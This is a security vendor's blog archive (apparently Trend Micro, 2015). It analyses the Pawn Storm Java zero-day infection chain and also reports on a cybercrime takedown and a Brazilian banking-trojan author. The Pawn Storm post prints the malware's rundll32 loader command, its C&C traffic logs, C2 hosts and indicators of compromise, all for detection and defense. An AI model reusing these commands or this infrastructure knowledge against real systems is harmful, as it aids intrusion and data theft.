Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:


  • Zero-Day Alerts

  • Hacking Team Leak

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    3031  
  • Email Subscription

  • About Us


    Author Archive - Trend Micro




    Our monitoring of Operation Pawn Storm has led us to an interesting finding: the domain we previously reported hosting the Java 0-day used in the latest Pawn Storm campaign was modified to now lead to a Trend Micro IP address. Our investigations have shown that our systems have not been attacked or compromised. The attackers have simply redirected a DNS record to point to a Trend Micro IP address, likely in retaliation to our disclosure and the subsequent patching of the Orace Java zero-day vulnerability they were exploiting.

    PawnStorm

    Figure 1. Changes in the Pawn Storm infection chain

    The DNS A record of the domain ausameetings[.]com now points to 216.104.20.189, an IP address of Trend Micro. While it was serving the zero-day exploit, the IP address of ausameetings[.]com was 95[.]215[.]45[.]189.

    ausameetings_com_DNS_A

    Figure 2. DNS A record of ausameetings[.]com

    We are not sure when the domain was pointed to Trend Micro, but based from DNS record naming convention, it is most likely modified to point to Trend Micro yesterday, July 14.

    We do not have clear evidence that point to the cause behind these developments, but we see the following possible motives:

    • To serve as a form of retaliation by the Pawn Storm operators against Trend Micro for disclosing details about their most recent campaign
    • To mislead network administrators into associating our IP address to the attack, possibly causing admins to mistakenly block it
    • To deceive security researchers into thinking that the Trend Micro IP address is compromised or being misused by Operation Pawn Storm

    It bears stressing that we found no traces of compromise or misuse. We will continue to monitor this and update this post as soon as there are relevant developments.

    Operation Pawn Storm is a campaign known to specifically target government organizations. One of its most recent campaigns targeted NATO members as well as the White House.

    We first discovered the Java 0-day being used in Operation Pawn Storm late last week. Oracle released a security update to address the vulnerability yesterday, July 14.

     
    Posted in Targeted Attacks |



    Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns.

    Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House. Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590. This is the first time in nearly two years that a new Java zero-day vulnerability was reported.

    The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry on how the exploit itself works can be found here. This blog entry is intended to help readers identify traffic in their network that would indicate if such an exposure had occurred. We strongly recommend that all readers roll out the Oracle patch as soon as possible

    Infection sequence

    Trend Micro has observed that an entity belonging to the target profile received an email that contains the following URL:

    • hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/

    It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid domain “ausameetings.org,” which is a site for AUSA’s (Association of the United States Army) annual exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a one-time use for a specific set of targets.

    When assessing this URL, it was determined that the most probable infection sequence is:

    Figure 1. Infection chain

    Like all multi-stage infections, a successful execution of the previous stage is required before moving to the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the victim’s spearphishing email.

    Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is downloaded and executed it drops and runs the DLL file (Stage 3) which is the final component to infect the machine with SEDNIT.

    The information that we have on each of these steps is as follows.
    Further information on each of these stages can be found in the sections below.

    Stage Type SHA1 File Name File Size Trend Micro Detection
    Stage 1 Java Exploit 95dc765700f5af406883
    d07f165011d2ff8dd0fb
    Spearphishing URL matching hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/ JAVA_DLOADR.EFD
    Stage 2 PE b4a515ef9de037f18d96
    b9b0e48271180f5725b7
    Drops as cormac.mcr

    End resulting file on host system as vhgg5hkvn25.exe
    1,619,968 bytes TROJ_DROPPR.CXC
    Stage 3 DLL 21835aafe6d46840bb69
    7e8b0d4aac06dec44f5b
    api-ms-win-downlevel-profile-l1-1-0.dll 40,960 bytes TSPY_SEDNIT.C

    Stage 1 – the Java exploit

    The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is the observed method for Operation Pawn Storm attacks.

    The initial spearphishing URL is constructed similar to:

    • hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/

    The web pages on this domain that were found to drop the Java zero-day exploit include:

    • 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ
    • 3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ

    The network traffic observed for the infection sequence of this stage is:

    1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the 2015annualmeeting URI path.
    2. Send an encoded POST call, which, when decoded, is the variable to construct the subsequently used URI path. This is particularly interesting as it appears that each URI path on the malicious server is customized by the victim’s infection, rather than static on the web server.
    3. The victim machine then does a variety of GET calls to pull down JPG, JNLP, and Java class files.
    4. If the Java class files cannot be found on the primarily domain (ausameetings[.]com), it appears to instead attempt to get these files from a hardcoded IP (87[.]236[.]215[.]132).
    5. Once the class files are downloaded, the victim machine then does a GET call to fetch the file cormac.mcr. This file is the PE file for Stage 2.

    For completeness, the specific traffic calls observed relating to Stage 1 include the following:

    Result Protocol Host URL Size Content-Type
    200 HTTP ausameetings[.]com /url?={BLOCKED}/2015annualmeeting/ 19,225 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /VFlmsRH/7311/4388/558923/?p2=KlW2HlMf&c=
    BMjNiBV&recr=Wr1mI7&p3=364397021&
    as=SAUmj&c=GY9oCdQ&
    22 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/ 4,077 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/line.jpg 22,500 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/right.jpg 97,247 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/init.jnlp 562 application/x-java-jnlp-file
    200 HTTP ausameetings[.]com /url/544036/ 4,077 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/jndi.properties 125 text/html; charset=utf-8
    404 HTTP ausameetings[.]com /url/544036/Go.class 0 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Go.class 1,373 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /crossdomain.xml 0 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/App.class 7,552 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Help.class 5,667 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/PhantomSuper.class 763 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/ArrayReplace.class 729 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/App$PassHandleController.class 980 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Converter.class 2,820 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/MyByteArrayInputStream.class 1,282 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /2/pkg/None2.class 0 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /2/pkg/None.class 0 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/cormac.mcr 1,619,968 application/octet-stream

    Trend Micro detects these Java class files as JAVA_DLOADR.EFD:

    • App.class (7,552 bytes)
    • Go.class (1,373 bytes)
    • Help.class (5,667 bytes)

    The second and third traffic calls in the traffic pattern are particularly interesting to note.


    Figure 2. Traffic patterns (click the image to enlarge)

    One can observe that the second call sends a POST to ausumeetings[.]com, and is returned with a text responsecfa that then subsequently is used as the URI path for the subsequent HTTP requests.

    Stage 2 – The PE file

    Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The primary purpose of this PE is to drop and load the DLL executable. It is downloaded as Cormac.mcr, but once extracted, the file name is converted into a randomized file name. It is installed into the %USERPROFILE% directory and then executed, creating a service by the same name.

    During its installation, a variety of other services also appear to be hooked, including lsass, lsm, and conhost, amongst others.


    Figure 3. Observed processes (click the image to enlarge)

    Once the malware is executed, it will drop the Stage 3 DLL file with filename api-ms-win-downlevel-profile-l1-1-0.dll in the %TEMP% directory. To load the malware, it executes rundll32.exe using the following command:

    • rundll32.exe “%temp%/api-ms-win-downlevel-profile-l1-1-0.dll”,init

    Stage 3 – The DLL file

    This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file triggers the DLL (in this instance, %windir%\system32\RunDll32.exe Command: “%windir%\system32\RunDll32.exe ” “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ap i-ms-win-downlevel-profile-l1-1-0.dll”,init), the following traffic was observed.

    1 POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: www.google.com
    Content-Length: 0
    Note: Assumed to be a local connectivity test traffic call.
    2 POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 830
    3 POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: www.google.com
    Content-Length: 0
    Note: Assumed to be a local connectivity test traffic call.
    4 POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 0
    5 POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 26

    It bears stressing that we do not encourage using the data presented above as IOCs for your own analysis. The network traffic generated by this stage was a challenge to assess as it appears to have polymorphic capabilities in the creation of URI paths utilized to pull down files. After assessing the samples multiple times, each network traffic infection sequence appeared to be different, no matter what sequence of testing was performed (e.g., same machine, different machines, different geographic IP space globally, etc.).

    After detailed network forensics of the traffic, it was determined that no single stable URL path or URI query component (URI path component, file name, or URI query parameter) showed a consistent pattern (either same entry nor regex definable pattern), and further reverse engineering was required to determine the methods used to achieve this.

    As a result of this additional analysis, it was determined that the URI path is a random generated string with the following pattern:

    • ^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=<Encoded ID>

    Figure 4. Regex expression

    Included in the POST request is a data encoded with Base64 and XOR encryption. The encoded data contains the following system information of the infected machine:

    • OS Version
    • List of running processes
    • Hard Disk Drive Information
    • Volume Serial Number

    TSPY_SEDNIT.C connects to three C&C servers:

    • 192[.]111[.]146[.]185 (direct to IP call)
    • www[.]acledit[.]com
    • www[.]biocpl[.]org

    After sending the encrypted data it will wait for a reply which is encrypted by the same algorithm above.

    Phase 2 of the attack: the keystroke logger

    Based on our investigation of Operation Pawn Storm, we know that the infection happens in two stages:

    • In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of the first level dropper, which installs the downloader component (.DLL file).
    • In phase 2, the downloader component communicates with a C&C server and downloads other components, and at the end of the chain a keylogger is installer. The keylogger sends data back to the C&C server.

    As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable file.

    Victims of the Attack

    A number of victims were identified during the course of our investigation. The targets are in the United States or Canada, and those we were able to identify via IP are big defense contractors, as typical for Operation PawnStorm.

    Countermeasures

    Trend Micro is already able to protect users against this threat without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention detects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability

    Oracle has also provided a security patch for the related vulnerability.

    Indicators of Compromise

    The following table summarizes the identified stable IOCs that can be used to search for this attack. The “Precision” column indicates how close to the direct parameter the indicator is, inversely indicating likelihood of collateral false positives.

    Stage Type Indicator Precision
    Infection Sequence – Stage 1 Domain ausameetings[.]com High
    Infection Sequence – Stage 1 Domain_IP 95[.]215[.]45[.]189 Low
    Infection Sequence – Stage 1 IP 87[.]236[.]215[.]132 High
    Infection Sequence – Stage 1 URIPath_FileName ArrayReplace.class Medium
    Infection Sequence – Stage 1 URIPath_FileName App$PassHandleController.class Medium
    Infection Sequence – Stage 1 URIPath_FileName Converter.class Medium
    Infection Sequence – Stage 1 URIPath_FileName MyByteArrayInputStream.class Medium
    Infection Sequence – Stage 1 URIPath_FileName None2.class Medium
    Infection Sequence – Stage 1 URIPath_FileName None.class Medium
    Infection Sequence – Stage 1->2 URIPath_FileName cormac.mcr High
    Infection Sequence – Stage 3 192[.]111[.]146[.]185 High
    Infection Sequence – Stage 3 IP_DirectCall 37[.]187[.]116[.]240 High
    Infection Sequence – Stage 3 Domain www[.]acledit[.]com High
    Infection Sequence – Stage 3 Domain www[.]biocpl[.]org High

    Other posts related to Operation Pawn Storm can be found here:

    Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and clarifications to the infection flow.

    Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow.

    Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes.

     



    Oracle has released its Critical Patch Update for the month of July. The update provides fixes for 193 new security vulnerabilities, including the recently announced zero-day vulnerability first reported by Trend Micro researchers. What makes the zero-day discovery more notable is that it is being used in an ongoing targeted attack campaign, Operation Pawn Storm. This particular vulnerability was designated as CVE-2015-2590.

    Trend Micro first came across this vulnerability (and exploit) as part of our ongoing investigations on Operation Pawn Storm. We found email messages  targeting a certain armed forces of a NATO country and a US defense organization contained these malicious URLs where the Java exploit is hosted. This exploit sets off a chain of malware infections that lead to its final payload: an information-stealing malware.

    More details about the connections between Pawn Storm and this vulnerability will be made available in an upcoming blog entry.

    We recommend users install the latest security fix from Java immediately.

    Trend Micro is already able to protect users against exploits targeting this vulnerability without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention detects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability
     
    Posted in Vulnerabilities |



    tsastsinIn November 2011 the Federal Bureau of Investigation (FBI), with the help of the Trend Micro Forward-looking Threat Researchers, conducted what was, at the time, the largest takedown in the history of online crime.

    Known as “Operation Ghost Click,” by the FBI, more than a hundred servers belonging to the Esthost/Rove Digital group were taken offline. The group’s data centers in New York and Chicago were raided and more than 4 million victims were given over half a year to change over to non-malicious DNS servers.

    Almost four years after the takedown, the leader of this particular cybercrime group, Vladimir Tsastsin, has pleaded guilty to various charges before a US federal magistrate. He now faces up to six years in a US federal penitentiary.

    At its heart, the Esthost/Rove Digital scheme was a relatively simple one: plant DNS changer malware onto user systems and redirect queries for popular domains to malicious servers. This allowed the attackers to redirect the traffic aimed at these domains and carry out hard-to-detect but profitable attacks like hijacking search results and replacing website advertising. In addition to this, fake antivirus malware was also an important source of revenue for this organization.

    The attackers favored these methods as they were relatively difficult to detect and could be sustained for a long time. However, the group’s activities were already something that Trend Micro was aware of as early as 2006; even then we were already keeping track of their activities.

    In 2009, law enforcement agencies in Estonia and the United States began working with other organizations to help bring the activities of Esthost/Rove Digital to a halt; Trend Micro was the only antivirus company that joined this joint effort.

    Our research paper The Rove Digital Takedown summarizes our knowledge of this group in a single document.

    Our research on the takedown was an essential part of the case against Esthost/Rove Digital, and was indispensable to putting Tsastsin in jail.

    Tsastsin, before his arrest

    Six leaders of the scheme were arrested at the time of the takedown, including its mastermind Vladimir Tsastsin. It was not until late 2014 that he was extradited to the United States and formally charged. With his guilty plea, Tsastsin’s trial now moves on to sentencing. He faces up to six years in prison, with a sentence set to be handed down in October.

    Time and the courts have caught up to Tsastsin. This highlights how Trend Micro is committed to working with law enforcement agencies from across the world to help stamp out cybercrime and make the world safer for users.

    Our Forward-looking Threat Researchers, including Feike Hacquebord, who was a key part of this investigation, have worked side-by-side with law enforcement agencies across the world to help root our various cybercrime organizations.

    Collaboration between the private sector and law enforcement is a subject that we have talked about before and our position on this has been consistent for quite some time. As a company, we remain committed to helping bring cybercriminals to justice before the appropriate judicial systems.
     
    Posted in Malware |



    A 20-year-old college student whose underground username is Lordfenix has become one of Brazil’s top banking malware creators. Lordfenix developed his underground reputation by creating more than a hundred online banking Trojans, each valued at over US$300. Lordfenix is the latest in a string of young and notorious solo cybercriminals we’re seeing today.

    Who is Lordfenix?

    Lordfenix is a 20-year old Computer Science student from Tocantins, Brazil. We were able to trace his activity back to April 2013. At the time, he was operating under a different handle, Filho de Hakcer (Portuguese for “hacker’s son,” but misspelled). He was posting in forums, asking for programming assistance for a Trojan he was supposedly creating.

    Figure 1. Forum post of Lordfenix, then Filho de Hakcer

    Based on a photo he posted on Facebook dated September 2013, it appears he was successful in his work.

    Figure 2. Facebook post boasting of his success with his Trojan

    Information theft via fake browsers

    Lordfenix has since continued to develop and sell banking Trojans, one of which we detect as TSPY_BANKER.NJH. This Trojan is able to identify when a user types any of its target banks’ URLs. Among these targets are Banco de Brasil, Caixa, and HSBC Brasil.

    It is then able to close the current browser window (if it’s running on Google Chrome), display an error message, and then open a new fake Chrome window. This whole routine is almost unnoticeable since the browser windows are switched seamlessly. In case the user’s browser is Internet Explorer or Firefox, the original window stays open, but the error message and the fake browser window still appear.

    Figure 3. Fake browser window

    Figure 4. Spoofed HSBC Brasil banking site

    Figure 5. Spoofed Banco de Brasil banking site

    If the user enters his login credentials in the fake window, the malware sends the information back to the attacker via email—the same email address Lordfenix used during his “Filho de Hakcer” days.

    For added protection against security products, this malware terminates the process GbpSV.exe. This process is associated with the software G-Buster Browser Defense, a security program many Brazilian banks use to defend against information theft and protect their customers’ privacy during online transactions.

    Cybercrime for free

    Lordfenix has grown quite confident in his skills. We found him offering free versions of fully-functional banking Trojan source code to underground forum members. He claims these free versions can steal credentials from customers of four different banks. But this generosity has a limit. If other members would like to target more banks, they would have to contact him, and he would sell them TSPY_BANKER.NJH. We checked this banking Trojan and it is, in fact, operational.

    Figure 6. Forum post advertising free banking Trojan source code

    We also found him advertising banking Trojans through his Skype profile. There, the Trojans are referred to as keylogger (KL) proxy—based on the keylogging capabilities of the malware.

    Figure 7. Lordfenix’s Skype profile

    Cybercriminal upstart

    Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013. With each Trojan costing around R$1,000 (roughly US$320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture.

    Aside from the ease of creating malware, a few other factors may have urged Lordfenix to start up his own little enterprise:

    • Brazil has a huge online banking user base. In 2013 alone, around 51% percent of all banking transactions within the country were done via the Internet.
    • Digital crime is not necessarily a top priority in Brazil. The penalties against offenders are currently very low.

    Despite working alone and being only 20 years old, Lordfenix has managed to make his name known among his fellow criminals. His story—the young cybercriminal inflicting serious damage—is near-identical to that of the teens developing mobile ransomware in China. He is also not the first solo operator we have noted this quarter. The likes of Frapstar (Canada) and the cybercriminals behind FighterPOS (Brazil) and HawkEye (Nigeria) are all individual players using basic malware to gain profit.

    In cybercrime, it doesn’t matter if the criminal is a veteran or a newbie. The result remains the same: ordinary users become victims.

    Update as of July 10, 2015, 11:45 AM PDT (UTC – 7)

    Below are the SHA1 hashes related to this threat:

    • fc79d98729dd156f8ab66292b0fb31cea5f7ee5f
    • cf82708f251e2a8ce63994bea41cff35475de0e8
    • c054127cfd6170e091f32d6a7ad1092d4d2edc8d
    • 39d93b4fcc36ef52ba18c87ddd294a846c5811be
    • c88012dbc818941b1e62dcd53739ad821fd01c24
    • d98409510804e895e082840e9591e6a798294fda
    • dac73434e6d2894a835ed2fbfa8552f22ec086b6
    • f2a77c29ddcbc68bdd3044449657cfedbf7ab5a3
    • 58624af9d383b117fe5d56369051c0e5e4dd9d7a
     
    Posted in Malware |


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice